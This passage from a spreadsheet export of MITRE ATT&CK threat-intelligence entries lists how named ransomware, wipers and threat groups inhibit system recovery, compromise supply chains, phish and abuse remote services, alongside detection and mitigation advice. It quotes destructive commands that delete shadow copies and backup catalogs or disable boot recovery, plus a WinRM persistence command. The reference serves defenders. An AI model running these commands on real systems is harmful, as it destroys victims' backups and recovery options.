[Babuk](https://attack.mitre.org/software/S0638) has the ability to delete shadow volumes using &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) attempts to remove the backup shadow files from the host using &lt;code&gt;vssadmin.exe Delete Shadows /All /Quiet&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can delete shadow copies using vssadmin.exe.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Trend Micro Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: Check Point Black Basta October 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can delete shadow copies using `vssadmin.exe delete shadows /all /quiet` and `wmic.exe Shadowcopy Delete`; it can also modify the boot loader using `bcdedit /set {default} recoveryenabled No`.(Citation: Microsoft BlackCat Jun 2022)
Clop
[Clop](https://attack.mitre.org/software/S0611) can delete the shadow volumes with &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; and can use bcdedit to disable recovery options.(Citation: Mcafee Clop Aug 2019)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) resets system restore points and deletes backup files.(Citation: SANS Conficker)
Conti
[Conti](https://attack.mitre.org/software/S0575) can delete Windows Volume Shadow Copies using &lt;code&gt;vssadmin&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can delete shadow volumes using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: Prevailion DarkWatchman 2021)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.(Citation: Fortinet Diavol July 2021)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) removes backups of Volume Shadow Copies to disable any restoration capabilities.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) disable recovery options and deletes shadow copies from the victim.(Citation: Cisco H1N1 Part 2)
HELLOKITTY
[HELLOKITTY](https://attack.mitre.org/software/S0617) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can disable the VSS service on a compromised host using the service control manager.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)
JCry
[JCry](https://attack.mitre.org/software/S0389) has been observed deleting shadow copies to ensure that data cannot be restored easily.(Citation: Carbon Black JCry May 2019)	
Maze
[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has deleted volume shadow copies using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: IBM MegaCortex)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`.(Citation: Check Point Meteor Aug 2021)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the native Windows utilities &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, and &lt;code&gt;bcdedit&lt;/code&gt; to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.(Citation: Talos Olympic Destroyer 2018)
Prestige
[Prestige](https://attack.mitre.org/software/S1058) can delete the backup catalog from the target system using: `c:\Windows\System32\wbadmin.exe delete catalog -quiet` and can also delete volume shadow copies using: `\Windows\System32\vssadmin.exe delete shadows /all /quiet`.(Citation: Microsoft Prestige ransomware October 2022)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can use vssadmin.exe to remove volume shadow copies.(Citation: Group IB Ransomware September 2020)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has the functionality to delete shadow copies.(Citation: CERT-FR PYSA April 2020) 
REvil
[REvil](https://attack.mitre.org/software/S0496) can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using &lt;code&gt;vssadmin delete shadows /all /quiet&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)
RobbinHood
[RobbinHood](https://attack.mitre.org/software/S0400) deletes shadow copies to ensure that all the data cannot be restored easily.(Citation: CarbonBlack RobbinHood May 2019) 
Royal
[Royal](https://attack.mitre.org/software/S1073) can delete shadow copy backups with vssadmin.exe using the command `delete shadows /all /quiet`.(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: CISA Royal AA23-061A March 2023)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; to to delete volume shadow copies and &lt;code&gt;vssadmin resize shadowstorage&lt;/code&gt; to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, &lt;code&gt;bcdedit&lt;/code&gt;, and &lt;code&gt;wmic&lt;/code&gt; to delete and disable operating system recovery features.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can delete shadow volumes.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Review and monitor financial application logs for signs of financial theft, such as abnormal monetary transactions or resource balances.
Email logs may also highlight account takeovers, impersonation, or another activity that may enable monetary theft.
User Account Management
Limit access/authority to execute sensitive transactions, and switch to systems and procedures designed to authenticate/approve payments and purchase requests outside of insecure communication lines such as email.
User Training
Train and test users to identify social engineering techniques used to enable financial theft.
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has observed the victim's software and infrastructure over several months to understand the technical process of legitimate financial transactions, prior to attempting to conduct fraudulent transactions.(Citation: Sygnia Elephant Beetle Jan 2022)
SilverTerrier
[SilverTerrier](https://attack.mitre.org/groups/G0083) targets organizations in high technology, higher education, and manufacturing for business email compromise (BEC) campaigns with the goal of financial theft.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.
Update Software
A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.
Vulnerability Scanning
Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) gained initial network access to some victims via a trojanized update of SolarWinds Orion software.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
APT41
[APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has compromised legitimate web browser updates to deliver a backdoor. (Citation: Crowdstrike GTR2020 Mar 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has placed trojanized installers for control system software on legitimate vendor app stores.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has gained initial access by compromising a victim's software supply chain.(Citation: Mandiant FIN7 Apr 2022)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has distributed [NotPetya](https://attack.mitre.org/software/S0368) by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.(Citation: Secureworks NotPetya June 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised the Able Desktop installer to gain access to victim's environments.(Citation: Trend Micro Iron Tiger April 2021)
CCBkdr
[CCBkdr](https://attack.mitre.org/software/S0222) was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.(Citation: Talos CCleanup 2017)(Citation: Intezer Aurora Sept 2017)(Citation: Avast CCleaner3 2018)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)
SUNSPOT
[SUNSPOT](https://attack.mitre.org/software/S0562) malware was designed and used to insert [SUNBURST](https://attack.mitre.org/software/S0559) into software builds of the SolarWinds Orion IT management product.(Citation: CrowdStrike SUNSPOT Implant January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Host Status
Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and and compare against known good baseline behavior.
Boot Integrity
Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.
Update Software
A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.
Vulnerability Scanning
Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) adds malicious code to a host's Xcode projects by enumerating CocoaPods &lt;code&gt;target_integrator.rb&lt;/code&gt; files under the &lt;code&gt;/Library/Ruby/Gems&lt;/code&gt; folder or enumerates all &lt;code&gt;.xcodeproj&lt;/code&gt; folders under a given directory. [XCSSET](https://attack.mitre.org/software/S0658) then downloads a script and Mach-O file into the Xcode project folder.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may send phishing messages to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers. Correlate these records with system events.
File Creation
Monitor for newly constructed files from a phishing messages to gain access to victim systems.
Network Traffic Content
Monitor and analyze SSL/TLS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Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Antivirus/Antimalware
Anti-virus can automatically quarantine suspicious files.
Network Intrusion Prevention
Network intrusion prevention systems and systems designed to scan and remove malicious email attachments or links can be used to block activity.
Restrict Web-Based Content
Determine if certain websites or attachment types (ex: .scr, .exe, .pif, .cpl, etc.) that can be used for phishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
User Training
Users can be trained to identify social engineering techniques and phishing emails.
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used spear phishing to initially compromise victims.(Citation: Cisco Group 72)(Citation: Novetta-Axiom)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has conducted malicious spam (malspam) campaigns to gain access to victim's machines.(Citation: Secureworks REvil September 2019)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) has been spread through spear phishing.(Citation: Novetta-Axiom)
Royal
[Royal](https://attack.mitre.org/software/S1073) has been spread through the use of phishing campaigns including "call back phishing" where victims are lured into calling a number provided through email.(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: CISA Royal AA23-061A March 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.
Logon Session Metadata
Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.
Network Connection Creation
Monitor for newly constructed network connections that may use Valid Accounts to access and/or persist within a network using External Remote Services. Use of External Remote Services may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using External Remote Services.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for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Disable or Remove Feature or Program
Disable or block remotely available services that may be unnecessary.
Limit Access to Resource Over Network
Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.
Multi-factor Authentication
Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.
Network Segmentation
Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) installed a modified Dropbear SSH client as the backdoor to target systems. (Citation: Booz Allen Hamilton)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used Citrix and VPNs to persist in compromised environments.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.(Citation: BlackBerry CostaRicto November 2020)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used compromised VPN accounts to gain access to victim systems.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/service@{EnableCompatibilityHttpsListener="true"}`.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used stolen credentials to connect to the victim's network via VPN.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used compromised identities to access networks via SSH, VPNs, and other remote access tools.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
APT18
[APT18](https://attack.mitre.org/groups/G0026) actors leverage legitimate credentials to log into external remote services.(Citation: RSA2017 Detect and Respond Adair)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used [Tor](https://attack.mitre.org/software/S0183) and a variety of commercial VPN services to route brute force authentication attempts.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used compromised identities to access networks via VPNs and Citrix.(Citation: NCSC APT29 July 2020)(Citation: Mandiant APT29 Microsoft 365 2022)
APT41
[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.(Citation: US-CERT TA18-074A)(Citation: CISA AA20-296A Berserk Bear December 2020)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has gained access to compromised environments via remote access services such as the corporate virtual private network (VPN).(Citation: Mandiant FIN13 Aug 2022)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.(Citation: Secureworks REvil September 2019)	
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has gained access through VPNs including with compromised accounts and stolen VPN certificates.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP to establish persistence.(Citation: CISA AA20-301A Kimsuky)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix. (Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used external remote services such as virtual private networks (VPN) to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) uses remote services such as VPN, Citrix, or OWA to persist in an environment.(Citation: FireEye APT34 Webinar Dec 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots June 2017)(Citation: ANSSI Sandworm January 2021)
Scattered Spider
[Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged legitimate remote management tools to maintain persistent access.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a VPN to persist in the victim environment.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.(Citation: Intezer TeamTNT September 2020)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also targeted exposed kubelets for Kubernetes environments.(Citation: Unit 42 Hildegard Malware)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors look for and use VPN profiles during an operation to access the network using external VPN services.(Citation: Dell TG-3390) [Threat Group-3390](https://attack.mitre.org/groups/G0027) has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.(Citation: SecureWorks BRONZE UNION June 2017)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
Doki
[Doki](https://attack.mitre.org/software/S0600) was executed through an open Docker daemon API port.(Citation: Intezer Doki July 20)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) was executed through an unsecure kubelet that allowed anonymous access to the victim environment.(Citation: Unit 42 Hildegard Malware)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) was executed in an Ubuntu container deployed via an open Docker daemon API.(Citation: Aqua Kinsing April 2020)
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) attempts to gain access to the server via SSH.(Citation: Anomali Linux Rabbit 2018)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can establish an SSH connection from a compromised host to a server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
File Creation
Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.
Network Connection Creation
Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data. 
Network Traffic Content
Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use  network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Process Creation
Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, or evidence of Discovery.
Application Isolation and Sandboxing
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist.(Citation: Windows Blogs Microsoft Edge Sandbox)(Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist for these types of systems.(Citation: Ars Technica Pwn2Own 2017 VM Escape)
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.
Restrict Web-Based Content
For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.
Update Software
Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique. Use modern browsers with security features turned on.
C0010
During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.(Citation: Mandiant UNC3890 Aug 2022)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.(Citation: Cylance Dust Storm)
APT19
[APT19](https://attack.mitre.org/groups/G0073) performed a watering hole attack on forbes.com in 2014 to compromise targets.(Citation: Unit 42 C0d0so0 Jan 2016)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has compromised targets via strategic web compromise utilizing custom exploit kits.(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has infected victims by tricking them into visiting compromised watering hole websites.(Citation: ESET OceanLotus)(Citation: Volexity Ocean Lotus November 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Volexity InkySquid BLUELIGHT August 2021)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has conducted watering holes schemes to gain initial access to victims.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used watering hole attacks to gain access.(Citation: Cisco Group 72)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) compromised three Japanese websites using a Flash exploit to perform watering hole attacks.(Citation: Symantec Tick Apr 2016)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a watering hole to serve up malicious code.(Citation: Lookout Dark Caracal Jan 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) used embedded iframes on hotel login portals to redirect selected victims to download malware.(Citation: Kaspersky Darkhotel)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)(Citation: Security Affairs Elderwood Sept 2012)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) delivered [RATANKBA](https://attack.mitre.org/software/S0241) and other malicious code to victims via a compromised legitimate website.(Citation: RATANKBA)(Citation: Google TAG Lazarus Jan 2021)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) has infected victims using watering holes.(Citation: Symantec Leafminer July 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has infected victims using watering holes.(Citation: CISA AA21-200A APT40 July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has distributed [Machete](https://attack.mitre.org/software/S0409) through a fake blog website.(Citation: Securelist Machete Aug 2014)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted watering-hole attacks through media and magazine websites.(Citation: ClearSky Kittens Back 3 August 2020)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has sometimes used drive-by attacks against vulnerable browser plugins.(Citation: Microsoft PLATINUM April 2016)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used watering hole attacks to deliver malicious versions of legitimate installers.(Citation: Bitdefender StrongPity June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used watering holes to deliver files with exploits to initial victims.(Citation: Symantec Patchwork)(Citation: Volexity Patchwork June 2018)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network &lt;code&gt;Yandex.Direct&lt;/code&gt;.(Citation: ESET RTM Feb 2017)(Citation: ESET Buhtrap and Buran April 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has extensively used strategic web compromises to target victims.(Citation: Dell TG-3390)(Citation: Securelist LuckyMouse June 2018)
Transparent Tribe
